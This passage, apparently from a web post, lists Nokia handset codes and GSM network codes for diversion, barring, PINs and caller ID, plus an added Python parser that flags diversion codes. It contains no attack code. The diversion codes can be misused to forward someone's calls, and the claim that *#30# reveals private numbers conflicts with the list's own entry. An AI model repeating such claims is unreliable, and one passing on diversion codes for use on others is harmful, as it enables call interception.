     *#4720# Deactivate Half Rate Codec

2.  *#0000# Displays your phone’s software version,
      1st Line :  Software Version,
      2nd Line : Software Release Date,
      3rd Line : Compression Type

3.  *#9999# Phone’s software version if *#0000# does not work.

4.  *#06# For checking the International Mobile Equipment Identity (IMEI Number).

5.  #pw+1234567890+1# Provider Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols).

6.  #pw+1234567890+2# Network Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols).

7.  #pw+1234567890+3# Country Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols).

8.  #pw+1234567890+4# SIM Card Lock Status.(use the “*” button to obtain the “p,w” and “+” symbols).

9.  *#147# (Vodafone) this lets you know who called you last. *#1471# Last call (only Vodafone).

10.  *#21# Allows you to check the number that “All Calls” are diverted to.

11.  *#2640# Displays security code in use. 

12.  *#30# Lets you see the private number.

13.  *#43# Allows you to check the “Call Waiting” status of your phone.

14.  *#61# Allows you to check the number that “On No Reply” calls are diverted to.

15.  *#62# Allows you to check the number that “Divert If Unreachable(no service)” calls are diverted to.

16.  *#67# Allows you to check the number that “On Busy Calls” are diverted to.

17.  *#67705646# removes operator logo on 3310 & 3330

18.  *#73# Reset phone timers and game scores

19.  *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature “SIM Clock Stop Allowed”, it means you will get the best standby time possible

20.  *#7760# Manufacturer’s code

21.  *#7780# Restore factory settings

22.  *#8110# Software version for the Nokia 8110

23.  *#92702689# (to remember *#WARRANTY#)
      Displays:
      1. Serial Number,
      2. Date Made,
      3. Purchase Date,
      4. Date of last repair (0000 for no repairs),
      5. Transfer User Data.
      To exit this mode, you need to switch your phone off then on again.

24.  *#94870345123456789# Deactivate the PWM-Mem

25.  **21*number# Turn on “All Calls” diverting to the phone number entered

26.  **61*number# Turn on “No Reply” diverting to the phone number entered

27.  **67*number# Turn on “On Busy” diverting to the phone number entered

  Each command is prefixed with either one or two * or # characters as follows:
    ** Register and Activate
    * Activate
    ## De-Register (and Deactivate)
    # Deactivate
    *# Check Status
    © Call button




Once each command has been entered, if it is a network command (as opposed to a local handset command), it must be transmitted to the network by pressing the YES (receiver) key, which acts as an enter key; this is represented here with the © character. Always enter numbers in full international format +CountryAreaNumber (e.g. +447712345678).
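
The prefix scheme above can be parsed mechanically. As an added example (not part of the original post), this Python code splits a network command into action, service code and parameters, and flags codes that register a call diversion to a supplied number, which is worth checking before keying in a code received from someone else. The function names are hypothetical and the service labels are a subset of the lists on this page.

```python
import re

# Prefix meanings as given in the list above.
ACTIONS = {"**": "register and activate", "*": "activate",
           "##": "de-register", "#": "deactivate", "*#": "check status"}
# Service codes and labels taken from the lists on this page (subset).
SERVICES = {"21": "divert all calls", "61": "divert on no answer",
            "62": "divert on not reachable", "67": "divert on busy",
            "002": "all call diversions",
            "004": "all configured call diversions",
            "33": "bar all outgoing calls", "35": "bar all incoming calls",
            "43": "call waiting", "30": "CLIP", "31": "CLIR"}
DIVERTS = {"21", "61", "62", "67", "002", "004"}
# Longest prefixes first so "**", "*#" and "##" win over "*" and "#".
MMI_RE = re.compile(r"^(\*\*|\*#|##|\*|#)(\d{2,3})((?:\*[^*#]*)*)#$")

def parse_mmi(code):
    """Split a code into action, service and '*'-separated parameters.

    Returns None for strings that do not fit the scheme, which includes
    the longer handset-local codes such as *#0000#.
    """
    m = MMI_RE.match(code.strip().rstrip("©"))  # © = call button marker
    if not m:
        return None
    prefix, service, tail = m.groups()
    params = tail.split("*")[1:] if tail else []
    return {"action": ACTIONS[prefix], "service": service,
            "label": SERVICES.get(service, "unknown"), "params": params}

def sets_divert_target(code):
    """True when the code registers a call diversion to a supplied number."""
    p = parse_mmi(code)
    return bool(p and p["service"] in DIVERTS
                and p["action"] == "register and activate"
                and p["params"] and p["params"][0])

if __name__ == "__main__":
    # Constructed inputs using the example number format from the text.
    for c in ("**21*+447712345678#©", "**61*+447712345678**20#", "*#21#"):
        print(c, parse_mmi(c), sets_divert_target(c))
```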


Security
Change call barring code **03*OldCode*NewCode*NewCode#©
Change call barring code **03*330*OldCode*NewCode*NewCode#©
Change PIN code **04*OldPIN*NewPIN*NewPIN#©
Change PIN2 code **042*OldPIN2*NewPIN2*NewPIN2#©
Unlock PIN code (when PIN is entered wrong 3 times) **05*PUK*NewPIN*NewPIN#©
Unlock PIN2 code (when PIN2 is entered wrong 3 times) **052*PUK2*NewPIN2*NewPIN2#©

Display IMEI *#06#

Call Forwarding (Diversions)
De-register all call diversions ##002#©
Set all configured call diversions to number and activate **004*number#©
De-register all configured call diversions (no answer, not reachable, busy) ##004#©

Unconditionally divert all calls to number and activate **21*number#©
Activate unconditionally divert all calls *21#©
De-register unconditionally divert all calls ##21#©
Deactivate unconditionally divert all calls #21#©
Check status of unconditionally divert all calls *#21#©
Divert on no answer to number and activate **61*number#©
Activate divert on no answer *61#©
De-register divert on no answer ##61#©
Deactivate divert on no answer #61#©
Check status of divert on no answer *#61#©
Divert on not reachable to number and activate **62*number#©
Activate divert on not reachable *62#©
De-register divert on not reachable ##62#©
Deactivate divert on not reachable #62#©
Check status of divert on not reachable *#62#©
Divert on busy to number and activate  **67*number#©
Activate divert on busy *67#©
De-register divert on busy ##67#©
Deactivate divert on busy #67#©
Check status of divert on busy *#67#©
Change number of seconds of ringing for the given service before diverting a call (such as on no answer). Seconds must be a value from 5 to 30. De-registering the same divert will also delete this change! **service*number**seconds#© (Service numbers, see below)

Call barring
Activate barring all outgoing calls (see Security to set code) **33*code#©
Deactivate barring all outgoing calls #33*code#©
Check status of barring all outgoing calls *#33#©
Activate barring all calls **330*code#©
Deactivate barring all calls #330*code#©
Check status of barring all calls *#330*code#©
Activate barring all outgoing international calls **331*code#©
Deactivate barring all outgoing international calls #331*code#©
Check status of barring all outgoing international calls *#331#©
Activate barring all outgoing international calls except to home country **332*code#©
Deactivate barring all outgoing international calls except to home country #332*code#©
Check status of barring all outgoing international calls except to home country *#332#©
Activate barring all outgoing calls **333*code#©
Deactivate barring all outgoing calls #333*code#©
Check status of barring all outgoing calls *#333#©
Activate barring all incoming calls **35*code#©
Deactivate barring all incoming calls #35*code#©
Check status of barring all incoming calls *#35#©
Activate barring all incoming calls when roaming **351*code#©
Deactivate barring all incoming calls when roaming #351*code#©
Check status of barring all incoming calls when roaming *#351#©
Activate barring all incoming calls **353*code#©
Deactivate barring all incoming calls #353*code#©
Check status of barring all incoming calls *#353#©

Call waiting
Activate call waiting *43*#©
Deactivate call waiting #43##©
Check status of call waiting *#43#©

Calling Line Identification
The following only works if CLIP and CLIR are enabled (ask your service provider)

CLIP: Presentation of the number of the incoming call
Activate CLIP **30#©
Deactivate CLIP ##30#©
Check status of CLIP *#30#©
CLIR: Presentation of one’s own number to the called party
Activate CLIR **31#©
Activate CLIR for the actual call *31#number©
Deactivate CLIR ##31#©
Deactivate CLIR for the actual call #31#number©
Check status of CLIR *#31#©
COLP: Presentation of the actual number reached (if number called was diverted to another number)
Activate COLP *76#©
Deactivate COLP #76#©
Check status of COLP *#76#©
COLR: Presentation of the original number called by the calling party (if the call was diverted to this cellphone)
Activate COLR *77#©
Deactivate COLR #77#©
Check status of COLR *#77#©